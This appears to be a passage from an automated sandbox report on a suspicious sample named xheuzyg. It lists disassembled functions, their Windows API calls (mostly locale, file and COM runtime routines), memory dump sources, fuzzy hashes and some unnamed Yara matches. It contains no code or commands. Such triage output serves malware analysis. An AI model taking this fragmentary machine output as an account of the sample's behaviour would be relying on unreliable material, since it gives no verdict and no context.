                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                  • Opcode ID: f3a3ad85105ffebee78f518ea01550f44cd43350b7814b21bf6482656e03ad1e
                                                                                                                                                                  • Instruction ID: 8c2585c0db506468a95fa83b71f080d1e4ee7ab9d90a88634665e19699ad68d5
                                                                                                                                                                  • Opcode Fuzzy Hash: f3a3ad85105ffebee78f518ea01550f44cd43350b7814b21bf6482656e03ad1e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7721B072619206ABEF28AE69DC62FBA37A8EF74710B14007EF902C6141EB74ED40C750
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(001C4A2C,00000001,00000000,?,-00000050,?,001C5060,00000000,?,?,?,00000055,?), ref: 001C4978
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                  • Opcode ID: bfbde90d769f8d97b8281ab37597bfca1f6fea1c70093a27c3ce1da0fffd9a31
                                                                                                                                                                  • Instruction ID: 15652d3dae73d6d6826918ebf5770d774f61a4b0ecc2afd16086ae547f0ec786
                                                                                                                                                                  • Opcode Fuzzy Hash: bfbde90d769f8d97b8281ab37597bfca1f6fea1c70093a27c3ce1da0fffd9a31
                                                                                                                                                                  • Instruction Fuzzy Hash: E5110C372087059FDB189F39D8A1ABABB91FF94359B14452CE94787A40D371F942C740
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001C4C48,00000000,00000000,?), ref: 001C4EDA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                  • Opcode ID: 820e16986045742921da54341879fc1fb4e6dd5c9a4efbbffa09b79a14c27886
                                                                                                                                                                  • Instruction ID: ec6efb2cd92438c7bf567da7637f46ee6c8a0b2c1f59ee7b379cef4e55643d1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 820e16986045742921da54341879fc1fb4e6dd5c9a4efbbffa09b79a14c27886
                                                                                                                                                                  • Instruction Fuzzy Hash: D601F932608116ABDF2C9A69CC16FFE3768EB51754F16442CED07A3580EB74FE41C6A4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(001C4C7F,00000001,?,?,-00000050,?,001C5028,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001C49EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                  • Opcode ID: ea8f1a0d9eb710ed09e74380dc3eeff9e2f0c3c0916d7e7ca56b66d125eaec8e
                                                                                                                                                                  • Instruction ID: 39f5fa8b866208c7a75942703200d0b9a6b3f99f4002ed22fbfd185e2d95a969
                                                                                                                                                                  • Opcode Fuzzy Hash: ea8f1a0d9eb710ed09e74380dc3eeff9e2f0c3c0916d7e7ca56b66d125eaec8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DF0C2362083045FDB249F3AD8D1F6A7BA1EF95368B15452CF9468BA90C7B1DC42C614
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001B6866: EnterCriticalSection.KERNEL32(?,?,001B7D90,00000000,001D8378,0000000C,001B7D58,?,?,001B6C5E,?,?,?,001BB51A,00000001,00000364), ref: 001B6875
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(001BC9C2,00000001,001D8640,0000000C,001BCDF7,00000000), ref: 001BCA07
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                  • Opcode ID: 4ac6106c0d0b70df3b6c5a260a6c0607d765545d17dc773ef069aa01905545bd
                                                                                                                                                                  • Instruction ID: 8bfaddd8caa0cda6ab982bad300075cc775211ef88c08e0d20d1618b2f42a5b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ac6106c0d0b70df3b6c5a260a6c0607d765545d17dc773ef069aa01905545bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF04F76A15204DFDB00EF68E942B9D7BF0FB14B25F00422AF511D7390CB7589408F81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(001C4814,00000001,?,?,?,001C5082,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C48F2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                  • Opcode ID: 5a188921246ec864009c1f12d5dfeb5fa6e8024ad02d8639828e2490ffeefd05
                                                                                                                                                                  • Instruction ID: 277ee5e59acfbc6855230db5d74a0ebcee828043dfe1d1b814db7cf3abea9a61
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a188921246ec864009c1f12d5dfeb5fa6e8024ad02d8639828e2490ffeefd05
                                                                                                                                                                  • Instruction Fuzzy Hash: C2F0553630024997CB049F79D855F6A7F90FFC1754B0A405CEA058B650C371D882C750
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001BA237,?,20001004,00000000,00000002,?,?,001B9829), ref: 001BCF2F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                  • Opcode ID: 856119147109bdbfd3188271b3da3e578ca1592fa1c414f9696e0c3225599f2f
                                                                                                                                                                  • Instruction ID: 177df21f3258cd4378f5ca6bbbfbbccf9b9e0283267ef7a334d1673a9cc20a80
                                                                                                                                                                  • Opcode Fuzzy Hash: 856119147109bdbfd3188271b3da3e578ca1592fa1c414f9696e0c3225599f2f
                                                                                                                                                                  • Instruction Fuzzy Hash: B9E04F3150422CBBCF126F61DC0CEEE3F16EF84750F044014FC0566120DB768961AAD5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010993,001B052D), ref: 001B098C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: deaf2a7635e0e31f8206e6097f2dafbccada397ff333287c93f3add80c50e30f
                                                                                                                                                                  • Instruction ID: d26afa1161dedf2c875f89faa90ff3a65903f2fb99599320a6a2a997add2bd88
                                                                                                                                                                  • Opcode Fuzzy Hash: deaf2a7635e0e31f8206e6097f2dafbccada397ff333287c93f3add80c50e30f
                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 07ea48942c085038ee52afdc05949c77fc22a7de2ed4d101839a950c80aee6ea
                                                                                                                                                                  • Instruction ID: fc6637427ecfc9151965054d80e6e4e0e328c5b66b78d865d7ac8ade25d9f0dd
                                                                                                                                                                  • Opcode Fuzzy Hash: 07ea48942c085038ee52afdc05949c77fc22a7de2ed4d101839a950c80aee6ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 3CA01230106104CB43004F31590420C3A947F001D47014019A401C0520DF2480905601
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                                                                  • Instruction ID: f14dd60b083a4bb03086c76e3351a5d4ed3faccd9a1e09b65c263c69f4036308
                                                                                                                                                                  • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                                                                  • Instruction Fuzzy Hash: B111A536610219AFDB20EF6DC890DAEB7E9EF546A87448015FC55CB310E334ED85C754
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                                                                  • Instruction ID: 0dde9b4c46367b8609694b68e737589d02d2f98930a5191ee3632a0d2c488f75
                                                                                                                                                                  • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                                                                  • Instruction Fuzzy Hash: ECE01A39665649EFDB48DBACCD81D65B3F8EB09234B144290F925C77A0E634EE04DA50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                                                                  • Instruction ID: 29f8c4897325b9757ef6347d42fd54f3959fbc0e7886140cf69a45f25bd374ec
                                                                                                                                                                  • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE0863B2107149BC775AB5DC840D96F7E8EF886B0B4A4425FD4997610C330FC05C790
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001C69C1: CreateFileW.KERNEL32(?,00000000,?,001C6DB4,?,?,00000000,?,001C6DB4,?,0000000C), ref: 001C69DE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C6E1F
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C6E26
                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 001C6E32
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C6E3C
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C6E45
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 001C6E65
                                                                                                                                                                  • CloseHandle.KERNEL32(001BE51F), ref: 001C6FB2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C6FE4
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C6FEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                  • String ID: H
                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                  • Opcode ID: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
                                                                                                                                                                  • Instruction ID: 9633f124ea54769ff564c0340860c861f182b8c755d8d5d09d6519315a9ebdce
                                                                                                                                                                  • Opcode Fuzzy Hash: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
                                                                                                                                                                  • Instruction Fuzzy Hash: 84A12436A041549FCF1DEF68DCA1FAE3BA1AB26324F18015EF8429F291CB35D852CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 001A1AB4
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1B03
                                                                                                                                                                  • CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1B1C
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 001A1B27
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 001A1B62
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 001A1B9A
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 001A1BD5
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 001A1C20
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 001A1C4B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocInitStringVariant$CreateInitializeInstanceIos_base_dtorSleepUninitializestd::ios_base::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2419184378-0
                                                                                                                                                                  • Opcode ID: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
                                                                                                                                                                  • Instruction ID: f184d25663381d68ad48b11e1fb41a3230ba730dc155ca10a042dfd5d94488b7
                                                                                                                                                                  • Opcode Fuzzy Hash: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
                                                                                                                                                                  • Instruction Fuzzy Hash: B0514C71204305AFD714EF64D885E6BB7B9FF8A704F400A5CF5468B291DB71E849CBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCPInfo.KERNEL32(013F17E0,013F17E0,?,7FFFFFFF,?,001C8BB1,013F17E0,013F17E0,?,013F17E0,?,?,?,?,013F17E0,?), ref: 001C8987
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 001C8A42
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 001C8AD1
                                                                                                                                                                  • __freea.LIBCMT ref: 001C8B1C
                                                                                                                                                                  • __freea.LIBCMT ref: 001C8B22
                                                                                                                                                                  • __freea.LIBCMT ref: 001C8B58
                                                                                                                                                                  • __freea.LIBCMT ref: 001C8B5E
                                                                                                                                                                  • __freea.LIBCMT ref: 001C8B6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 127012223-0
